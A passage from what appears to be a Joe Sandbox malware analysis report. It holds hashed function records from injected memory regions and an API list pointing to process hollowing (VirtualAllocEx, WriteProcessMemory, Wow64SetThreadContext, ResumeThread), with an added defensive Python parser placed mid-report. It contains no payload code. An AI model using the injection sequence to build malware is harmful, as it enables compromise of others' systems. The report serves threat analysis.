                                                                              • Instruction Fuzzy Hash: 98517170F102199FDB55EFA5C8547AEBBF6FF88700F208529D505AB395DA708C018B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4097023931.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_13d0000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 88997b1059cf019409113e9e64f4940e9cb38fa948b74df8a11f9c51a05e3acd
                                                                              • Instruction ID: d3d0f5ccdde044d56e0836f38aa830d4daf3e5ee0f1d3e561e43eb2e2e498595
                                                                              • Opcode Fuzzy Hash: 88997b1059cf019409113e9e64f4940e9cb38fa948b74df8a11f9c51a05e3acd
                                                                              • Instruction Fuzzy Hash: FA414272D043499FCB04DFB9D8006EEBFF5AF89210F1485AAD908A7241EB749884CBE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 013DEC87
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4097023931.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_13d0000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID:
                                                                              • API String ID: 1890195054-0
                                                                              • Opcode ID: b5fe0ec5e03d182efec24d30ff3894073ce98ef5fad350f9657af461b66c8770
                                                                              • Instruction ID: c7a9d659e5c3b86f53ecfb6d2a4b3e9123e50d24277213cde95e95b4d3e1098d
                                                                              • Opcode Fuzzy Hash: b5fe0ec5e03d182efec24d30ff3894073ce98ef5fad350f9657af461b66c8770
                                                                              • Instruction Fuzzy Hash: BE11EFB2C0066A9BDB10DF9AD544BDEFBF4AB48324F14816AD818B7250D378A944CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

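The function records above all come from two memory dumps of process 8 (base 013D0000 and base 06A40000) whose source lines read `00000040` in the protection field and `based on PE: false`: executable, writable memory that is not mapped from a PE file, which is where an unpacker or injector leaves the decoded payload. The following script is an added example, not Joe Sandbox code or part of this report: it parses records in the layout printed on this page, decodes the `.sdmp` file name, and flags the regions and shared String IDs an analyst would pivot on. The sample input is three records copied from this page with bullets and the Snapshot/Instruction lines dropped. The field order assumed for the `.sdmp` name (pid.timepoint.dumpid.base.protect.flag.type.flag) is inferred from the matching `hcaresult_8_2_13d0000` / `hcaresult_8_2_6a40000` snapshot names and is an assumption; only the Windows constants it compares against are documented values.

```python
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE, MEM_PRIVATE = 0x40, 0x20000  # documented Windows constants

# Constructed input: three records copied from the report above (bullets and the
# Snapshot/Instruction lines dropped for brevity). It is the only data used here.
SAMPLE = """APIs
GlobalMemoryStatusEx.KERNEL32 ref: 013DEC87
Memory Dump Source
Source File: 00000008.00000002.4097023931.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b5fe0ec5e03d182efec24d30ff3894073ce98ef5fad350f9657af461b66c8770
Opcode Fuzzy Hash: b5fe0ec5e03d182efec24d30ff3894073ce98ef5fad350f9657af461b66c8770
Uniqueness Score: -1.00%
Strings
Memory Dump Source
Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: d9f820ddb24ed17e1ff8c0b7054f7f54c8865efac05efd4560f6eba4d9e5ffba
Opcode Fuzzy Hash: d9f820ddb24ed17e1ff8c0b7054f7f54c8865efac05efd4560f6eba4d9e5ffba
Uniqueness Score: -1.00%
Strings
Memory Dump Source
Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 73f51243ae4804243e2f6e5577ce5ccb49d1af01baef89373b93efb8aaf4bd37
Opcode Fuzzy Hash: 73f51243ae4804243e2f6e5577ce5ccb49d1af01baef89373b93efb8aaf4bd37
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^(\w+)\.([A-Z0-9]+) ref: ([0-9A-Fa-f]+)$")  # Name.MODULE ref: addr
HEX = r"([0-9A-Fa-f]+)"
DUMP_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\." + r"\.".join([HEX] * 5) + r"\.sdmp$")

def parse_records(text):
    """One dict per function. 'Uniqueness Score' is the last line of every record
    on this page, so it closes a record; a trailing partial record is dropped."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        m = API_RE.match(line)
        if m:                                   # API call site: (api, module, address)
            cur["apis"].append((m[1], m[2], int(m[3], 16)))
        elif ":" in line:                       # "Key: value" line; headings are skipped
            key, _, value = line.partition(":")
            cur[key.strip()] = value.strip()
            if key.strip() == "Uniqueness Score":
                records.append(cur)
                cur = {"apis": []}
    return records

def decode_source(value):
    """Decode 'name.sdmp, Offset: X, based on PE: bool'. ASSUMPTION: the .sdmp name is
    pid.timepoint.dumpid.base.protect.flag.type.flag (inferred from the matching
    Snapshot File names on this page); the constants compared against are documented."""
    name, _, rest = value.partition(",")
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError("unexpected dump name: " + name)
    pid, tp, _dump_id, base, protect, _flag, mem_type, _flag2 = m.groups()
    return {"pid": int(pid), "timepoint": int(tp), "base": int(base, 16),
            "protect": int(protect, 16), "mem_type": int(mem_type, 16),
            "based_on_pe": rest.rsplit("based on PE:", 1)[1].strip().lower() == "true"}

def suspicious_regions(records):
    """Regions that are RWX and not mapped from a PE: where unpacked/injected code lives."""
    out = {}
    for r in records:
        src = decode_source(r["Source File"])
        if src["protect"] == PAGE_EXECUTE_READWRITE and not src["based_on_pe"]:
            out[src["base"]] = src
    return out

def shared_string_ids(records):
    """String IDs that appear in more than one function (a pivot between related code)."""
    groups = defaultdict(list)
    for r in records:
        if r.get("String ID"):
            groups[r["String ID"]].append(r["Opcode ID"][:12])
    return {k: v for k, v in groups.items() if len(v) > 1}

def opcode_id_matches_fuzzy(records):
    """On this page every 'Opcode ID' equals its 'Opcode Fuzzy Hash'; check that holds."""
    return all(r["Opcode ID"] == r["Opcode Fuzzy Hash"] for r in records)

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for base, s in suspicious_regions(recs).items():
        print(f"pid {s['pid']} tp {s['timepoint']}: {base:#x} RWX, not PE-backed")
    print("shared String IDs:", shared_string_ids(recs))
    print("API callers:", [r["apis"] for r in recs if r["apis"]])
```

Run against the full function listing, the same three functions answer the questions this section raises: which dumps are private RWX regions worth carving for the Yara hits listed in the overview, which functions reference the same string constant, and which of them touch an API (here `GlobalMemoryStatusEx` at 013DEC87) that an analyst will want to inspect in the dump at that address.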
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: d9f820ddb24ed17e1ff8c0b7054f7f54c8865efac05efd4560f6eba4d9e5ffba
                                                                              • Instruction ID: 8248dcfc7c91230cf711f4f4b245de00dc0a65ca24107f5cd5453e988d764dce
                                                                              • Opcode Fuzzy Hash: d9f820ddb24ed17e1ff8c0b7054f7f54c8865efac05efd4560f6eba4d9e5ffba
                                                                              • Instruction Fuzzy Hash: FD418F70E0030A9FDB65FF65D89469EBBB2FF85304F20452AE406EB244DB71E946CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: 73f51243ae4804243e2f6e5577ce5ccb49d1af01baef89373b93efb8aaf4bd37
                                                                              • Instruction ID: 1af12c13c8f886a691825ed7554cece5207ab07fba607a26f7845f1ce115ed54
                                                                              • Opcode Fuzzy Hash: 73f51243ae4804243e2f6e5577ce5ccb49d1af01baef89373b93efb8aaf4bd37
                                                                              • Instruction Fuzzy Hash: 6B31C130B102058FDB59BB74D95476FB7A2AFC9200F208568E406DB394EE35DD46CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b984840c8d1320fe4de271d09ba62c2ad8882d6ebfb63da84172b286d1ec7054
                                                                              • Instruction ID: 7b5fd57feaf438ad13b327d06726adae666b922800ddf3b6d5692308f1873ea8
                                                                              • Opcode Fuzzy Hash: b984840c8d1320fe4de271d09ba62c2ad8882d6ebfb63da84172b286d1ec7054
                                                                              • Instruction Fuzzy Hash: CA328234B012199FDB54FB69E980BADB7B2FB88320F108525D40AEB355DB35EC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1987bea4f030d56f9eb5da77f0846f3a0d3f41f48a38f95e8a2638c2bc06ab8
                                                                              • Instruction ID: c616df399511bc46db046985a27feb099b682842656143a6c2edbe4db1260bb2
                                                                              • Opcode Fuzzy Hash: f1987bea4f030d56f9eb5da77f0846f3a0d3f41f48a38f95e8a2638c2bc06ab8
                                                                              • Instruction Fuzzy Hash: C261AF71F000215FCB54AB7ECC846AFAAD7AFC5624B15447AD80EDB364DEA5DD0287C2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 85bbf3a22c9c26022db17f4b0765edf41959db5704cefa8349cacbcb8c50cc2c
                                                                              • Instruction ID: 2dc5cb46132485b362ab63918983804b8f0451b571f15eab2734035b72c1e6b3
                                                                              • Opcode Fuzzy Hash: 85bbf3a22c9c26022db17f4b0765edf41959db5704cefa8349cacbcb8c50cc2c
                                                                              • Instruction Fuzzy Hash: A6812A30B102159FDF54EBA9D9947AEB7E6EFC9304F108529D40ADB395EB30EC428B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 546be1c25dc698ae34fd5e1e9f2ed766ecfd1e9f2a3382c822241707edaeeeae
                                                                              • Instruction ID: 977ac29bb01a7718d55bf625bf10b59a95a27066655bb54b902ca0dae9ad828d
                                                                              • Opcode Fuzzy Hash: 546be1c25dc698ae34fd5e1e9f2ed766ecfd1e9f2a3382c822241707edaeeeae
                                                                              • Instruction Fuzzy Hash: F2913E30E1061A8FDF60EF68C880B9DB7B1FF89304F208595D549BB255DB71AA85CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac86902ab5730b3888b7b29d7da9be33fdd67bdf0783fb4aac08b12ca79db98c
                                                                              • Instruction ID: 041c5d06544d5d8f22e90ed7a1926de03094f5b5bfccea54e5831a727db63c4b
                                                                              • Opcode Fuzzy Hash: ac86902ab5730b3888b7b29d7da9be33fdd67bdf0783fb4aac08b12ca79db98c
                                                                              • Instruction Fuzzy Hash: 89912E30E1061A8BDF60EF68C880B9DB7B1FF89304F208595D549BB355EB71AA85CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e6fbe5dc7f6ed42d5f994f32fc15a692d4aa9b7832ba77d1ba3aeb4bb725e529
                                                                              • Instruction ID: 7e4ccb8bb1425f628db34b8b34ce9024aa27335bb12ca661c158f3fac82db9d5
                                                                              • Opcode Fuzzy Hash: e6fbe5dc7f6ed42d5f994f32fc15a692d4aa9b7832ba77d1ba3aeb4bb725e529
                                                                              • Instruction Fuzzy Hash: 5D711870A002099FDB55EBA9D980AADBBF6FFC8300F249529E405EB355DB30ED46CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              • Opcode Fuzzy Hash: a8f0ef7a2139886fd7206059dd4fa9f41f1300a59016881c0ddbaf8dc0327e37
                                                                              • Instruction Fuzzy Hash: D7018131B000111BDB64B6AED85072FA7DBEBCD710F24843AE50ECB745DE61DC424395
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 544d8726730a89dd602026bd16644733292afd86c5194f231f37f2aff05604c8
                                                                              • Instruction ID: c3b337ac86dfe32f626e3d55260b7bd6a6e53878dcb22f455bd93f40a5bdb735
                                                                              • Opcode Fuzzy Hash: 544d8726730a89dd602026bd16644733292afd86c5194f231f37f2aff05604c8
                                                                              • Instruction Fuzzy Hash: 6F01AF71B100101FDB65F6ADE890B3FA3EAEBC9720F149439E50ACB344DE21DC024395
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4cb3ac14fb83c739fab5d47c057eeff3d5eb9520c316b93cb1eff70ae0c8518
                                                                              • Instruction ID: 19a2cb8311b01702b8a76cb032f7a7d895aa8a8032a2c99a7ba7741eaf38c61a
                                                                              • Opcode Fuzzy Hash: a4cb3ac14fb83c739fab5d47c057eeff3d5eb9520c316b93cb1eff70ae0c8518
                                                                              • Instruction Fuzzy Hash: 28013134B101255FDB55FB6DE95072EB3D6EBCA714F108429E60ACB358EA21EC028785
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b40aa0db7b8f4af71256f290e7316b3965f4d12ac1527f2ab8db4e5a98ef84ad
                                                                              • Instruction ID: f1441c5b2e7f90a0f8169fcada3238f0ec829fc2213e467765d7adbf757c6718
                                                                              • Opcode Fuzzy Hash: b40aa0db7b8f4af71256f290e7316b3965f4d12ac1527f2ab8db4e5a98ef84ad
                                                                              • Instruction Fuzzy Hash: B701A734A052499FC790FFBCE8405ADBBB5FBC5314F104276D819D7295EB319942CBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d1d540eccaf7f52b8549f6f29d97897df0521c2c80873e5152045d3928a73b
                                                                              • Instruction ID: b139afecf7844b6a3e0a6ecfc85fa556a040703bb220560059ce7017db47b20b
                                                                              • Opcode Fuzzy Hash: a3d1d540eccaf7f52b8549f6f29d97897df0521c2c80873e5152045d3928a73b
                                                                              • Instruction Fuzzy Hash: 0401A431E11224ABCB54BA6AFC4169DB775F785324F104539E90AEB345DB32A80587C0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e1fd30dbafad8f7e9c9db812ca6df4d62a5c46af7c6a2e931c2f4122f3c3f34
                                                                              • Instruction ID: d9a07e4a453e9780d1a9ea0369dfd1630d9209e96ad9ac57f99370ddaeff674d
                                                                              • Opcode Fuzzy Hash: 5e1fd30dbafad8f7e9c9db812ca6df4d62a5c46af7c6a2e931c2f4122f3c3f34
                                                                              • Instruction Fuzzy Hash: CEE022B0E252087BCF60FB70CE2478A3B9E9B83250F1088A5E404CB102E276DA008792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f0b65934941c9ec8002dee5959485a4213d65f0fcd14b01403a09c020ae62a52
                                                                              • Instruction ID: e1d9c7eb24d6dbfd1482742088c22e1fdb665927c4deab2ea2fb3f23d4f556f5
                                                                              • Opcode Fuzzy Hash: f0b65934941c9ec8002dee5959485a4213d65f0fcd14b01403a09c020ae62a52
                                                                              • Instruction Fuzzy Hash: E1F0FE74A012198FD794FFB9D94026D7BE6BB85204F5042799809D7359EB30D942CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2222239885
                                                                              • Opcode ID: bbaaffb68b301a2f9f52b1e018fa3abd8abfc348c3d1bc1d1ad9b01cdfab319c
                                                                              • Instruction ID: ebee7815f49e431192d9dfbb39b8f7bffb24f32d248d2ab8334fdd099c10db17
                                                                              • Opcode Fuzzy Hash: bbaaffb68b301a2f9f52b1e018fa3abd8abfc348c3d1bc1d1ad9b01cdfab319c
                                                                              • Instruction Fuzzy Hash: A7121C30E002598FDB68EF75D9546AEB7F2BFC5304F208569D40AAB254DB30DD86CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: d450de88db3805394d963f49dfdf18f92fafdb6009e228baaf13f4b4b6232291
                                                                              • Instruction ID: 2a4876fa75fdc53a9eff5c8e6d81e2036da718a1cad01638839eaa4cb0636fcc
                                                                              • Opcode Fuzzy Hash: d450de88db3805394d963f49dfdf18f92fafdb6009e228baaf13f4b4b6232291
                                                                              • Instruction Fuzzy Hash: 0C917030E40209DFEBA8FBA5DA44B6EB7F2BF84304F108529D5029B359DB759C46CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-390881366
                                                                              • Opcode ID: 4a40878cc851041ab122bfa5549cd9d460e065149db8c56fa4a4939424ecde48
                                                                              • Instruction ID: 61495339f399b5285f2977c8592b772ef0c8aebe2fa523359df461f71eb10803
                                                                              • Opcode Fuzzy Hash: 4a40878cc851041ab122bfa5549cd9d460e065149db8c56fa4a4939424ecde48
                                                                              • Instruction Fuzzy Hash: AAF16D34A01259CFDB58FB69D984A6EB7F2FF84304F248568D4069B368DB31EC52CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 1f539a8da19cea25f7e361f84ab240bcdd32cf94a531486e3ad264111a899d0f
                                                                              • Instruction ID: ce2626bcfeb44ec6f67b5e8fb040d27cef9272931062c4ccc0f32e3689ccd29e
                                                                              • Opcode Fuzzy Hash: 1f539a8da19cea25f7e361f84ab240bcdd32cf94a531486e3ad264111a899d0f
                                                                              • Instruction Fuzzy Hash: 9EB15E30A112198FDB58FF69E9906AEB7B2FF84304F248929D406DB355DB74DC86CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LR^q$LR^q$$^q$$^q
                                                                              • API String ID: 0-2454687669
                                                                              • Opcode ID: c0345566293f32996bf29fdb10b7e7b2c8f282ca5112deb305de8c919d4a8c83
                                                                              • Instruction ID: b5dd872f868cb8406191aeb334ad2f9a12be70b696bfe4c4b86c563924b409d9
                                                                              • Opcode Fuzzy Hash: c0345566293f32996bf29fdb10b7e7b2c8f282ca5112deb305de8c919d4a8c83
                                                                              • Instruction Fuzzy Hash: 4151A130B002159FDB58FB29E980A6AB7E2FFC4700F148668D4069F3A5DB75EC45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 293f0aaeab30156d5c99864a942b24f126584aea68b9b0d662327a2efe8ede55
                                                                              • Instruction ID: 975b50592907eb1937f514228b44c5289dd1ea5f1ca272a1a5df045745c9c256
                                                                              • Opcode Fuzzy Hash: 293f0aaeab30156d5c99864a942b24f126584aea68b9b0d662327a2efe8ede55
                                                                              • Instruction Fuzzy Hash: F3518D30E112159FDF65FB68E9806AEB7B2EB85305F108929E9169B358DB30DC42CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:10.4%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:83
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph (rendered as an interactive graph in the original report; node and edge listing omitted). API calls appearing on the graph: CreateActCtxA, DuplicateHandle, GetModuleHandleW, LoadLibraryExW, ResumeThread, CreateProcessA, PostMessageW, ReadProcessMemory, VirtualAllocEx, Wow64SetThreadContext, WriteProcessMemory.
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8fd122df1ce92941350a1e00e30dd5b6c9a83a7a9ccdda75fcf864cbe0f6141
                                                                              • Instruction ID: 10dd50d92642beae657fd6cf636f7afd18eaf71b2d2ca7a9c42fd58b0369b7e1
                                                                              • Opcode Fuzzy Hash: a8fd122df1ce92941350a1e00e30dd5b6c9a83a7a9ccdda75fcf864cbe0f6141
                                                                              • Instruction Fuzzy Hash: 7E21D571E056188BEB08DFABD8046EEBAF7FFC9310F04C52AD409AB254EB740846CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph (rendered as an interactive graph in the original report; basic-block and edge listing omitted). Block range 56800df-56806da; calls to 56d2419/56d2428, 56d3be0/56d3bd0 and 56d450f/56d4520.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 555bea386725fc5d0488bc5a6768936c91ac120c4ac70ae98a709345e0244985
                                                                              • Instruction ID: e3e09a6d5bb09904c9651b675dcb572cb4025690cd7dd0d69f6f257e066a8b9f
                                                                              • Opcode Fuzzy Hash: 555bea386725fc5d0488bc5a6768936c91ac120c4ac70ae98a709345e0244985
                                                                              • Instruction Fuzzy Hash: EE51F434A00218CFEB64DF68D994BA9B7B2FB89300F108599D44DA7345CB34AE86CF52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted): function at 56de07c, containing a call to CreateProcessA
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056DE2BE
